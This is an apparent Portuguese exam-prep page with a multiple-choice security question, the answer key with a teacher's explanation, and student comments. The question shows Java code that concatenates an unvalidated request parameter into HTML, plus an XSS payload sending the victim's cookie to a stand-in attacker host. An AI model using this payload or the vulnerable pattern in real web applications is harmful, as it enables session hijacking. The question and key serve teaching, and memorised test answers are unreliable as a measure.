Considere um cenário em que uma aplicação utiliza dados não ...

Próximas questões
Com base no mesmo assunto
Q839370 Segurança da Informação

Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:


(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +

request.getParameter("credit_card") + " '>";


Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:


'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>'


Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.


Este é um cenário de ataque do tipo

Alternativas

Gabarito comentado

Confira o gabarito comentado por um dos nossos professores

Alternativa Correta: A - Cross-Site Scripting.

Vamos entender detalhadamente o porquê a alternativa A é a correta e analisar as demais alternativas.

Cross-Site Scripting (XSS):

Cross-Site Scripting, ou XSS, é um tipo de vulnerabilidade de segurança que permite a um atacante injetar scripts maliciosos em páginas web visualizadas por outros usuários. No cenário da questão, a aplicação utiliza dados não confiáveis para construir um fragmento HTML sem validação ou filtro adequado. Quando o atacante modifica o parâmetro 'credit_card' para incluir um script malicioso, ele consegue fazer com que o navegador da vítima execute esse script.

Essa execução do script resulta no envio do ID de sessão da vítima ao site do atacante, permitindo que ele sequestre a sessão. Isso caracteriza um ataque de XSS, onde o atacante explora a confiança que o usuário tem na aplicação.

Alternativas Incorretas:

Alternativa B - Buffer Overflow:

Buffer Overflow é uma vulnerabilidade que ocorre quando um programa tenta armazenar mais dados em um buffer do que ele pode suportar. Isso geralmente resulta na corrupção de dados e pode permitir a execução de código arbitrário. No entanto, no contexto da questão, não há menção a buffers ou transbordamento de dados, descartando essa alternativa.

Alternativa C - Advanced Persistent Threat (APT):

APT é um ataque cibernético prolongado e focado, onde um invasor ganha acesso a uma rede e permanece por um período prolongado sem ser detectado. O objetivo é roubar dados em vez de causar danos imediatamente. A questão descreve um ataque específico e pontual, não um comprometimento prolongado, descartando essa alternativa.

Alternativa D - Script-Fake Injection:

Script-Fake Injection não é um termo reconhecido na segurança da informação. A terminologia correta para ataques envolvendo scripts maliciosos em páginas web é Cross-Site Scripting (XSS), tornando essa alternativa incorreta.

Alternativa E - Session Persistent Hijacking:

Session Persistent Hijacking refere-se ao sequestro de uma sessão de usuário de maneira persistente, muitas vezes explorando falhas na gestão de sessões por parte da aplicação. Embora o ataque XSS descrito na questão possa levar ao sequestro de sessão, o termo correto para o tipo de ataque via injeção de scripts é Cross-Site Scripting (XSS).

Portanto, a resposta correta é A - Cross-Site Scripting, pois a questão descreve um ataque onde um script malicioso é injetado em uma aplicação web, explorando a falta de validação de entrada e causando o sequestro da sessão do usuário.

Clique para visualizar este gabarito

Visualize o gabarito desta questão clicando no botão abaixo

Comentários

Veja os comentários dos nossos alunos

A vulnerabilidade cross-site scripting não persistente (ou refletida) é, de longe, o tipo mais comum. Estas falhas aparecem quando os dados fornecidos por um cliente web, mais comumente em parâmetros de consulta HTTP ou envios de formulários HTML, é imediatamente utilizado pelos scripts do lado do servidor para analisar e exibir uma página de resultados de e para o usuário, sem a limpeza adequada do pedido.

Basta fazer a associação entrecross-site scripting e HTML.

Espero ter ajudado.

cxSvxCrrxbcCCCryVcsbxrCvfcryCCFFeXC

Cross-site scripting (XSS) é um tipo de vulnerabilidade do sistema de segurança de um computador, encontrado normalmente em aplicações web que activam ataques maliciosos ao injectarem client-side script dentro das páginas web vistas por outros usuários. Um script de exploração de vulnerabilidade cross-site pode ser usado pelos atacantes para escapar aos controles de acesso que usam a política de mesma origem.Através de um XSS, o hacker injeta códigos JavaScript em um campo texto de uma página já existente e este JavaScript é apresentado para outros usuários, porque persiste na página.

 

Buffer Overflow Frequentemente é noticiado que em uma aplicação qualquer foi encontrada a vulnerabilidade de buffer overflow (ou estouro de buffer) e que através dela um atacante consegue executar código arbitrário. O arbitrário quer dizer qualquer código que ele desejar, ou quase isso.

 

Ameaça persistente avançada  Essa expressão é comumente usada para se referir a ameaças cibernéticas, em particular a prática de espionagem via internet por intermédio de uma variedade de técnicas de coleta de informações que são consideradas valiosas o suficiente para que o agente espião despenda tempo e recursos para obtê-las. Ex.: Stuxnet: desenvolvido e disseminado por Estados Unidos e Israel, o worm Stuxnet foi projetado para atuar em um ciberataque contra o Irã.

 

 

Session Persistent Hijacking Em ciência da computação , o seqüestro de sessão , às vezes também conhecido como seqüestro de cookies, é a exploração de uma sessão de computador válida - às vezes também chamada de chave de sessão - para obter acesso não autorizado a informações ou serviços em um sistema informático. Em particular, é usado para se referir ao roubo de um cookie mágico usado para autenticar um usuário em um servidor remoto. Tem especial relevância para os desenvolvedores web , pois os cookies HTTP [1] usados ​​para manter uma sessão em muitos sites podem ser facilmente roubados por um invasor usando um computador intermediário ou com acesso aos cookies salvos no computador da vítima (verRoubo de cookies HTTP ).

 

Fontes: 

https://pt.wikipedia.org/wiki/Cross-site_scripting

http://www.crimesciberneticos.com/2011/02/entendendo-o-buffer-overflow.html

https://pt.wikipedia.org/wiki/Amea%C3%A7a_persistente_avan%C3%A7ada

https://en.wikipedia.org/wiki/Session_hijacking

 

 

 

 

 

 

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

https://en.wikipedia.org/wiki/Cross-site_scripting

Clique para visualizar este comentário

Visualize os comentários desta questão clicando no botão abaixo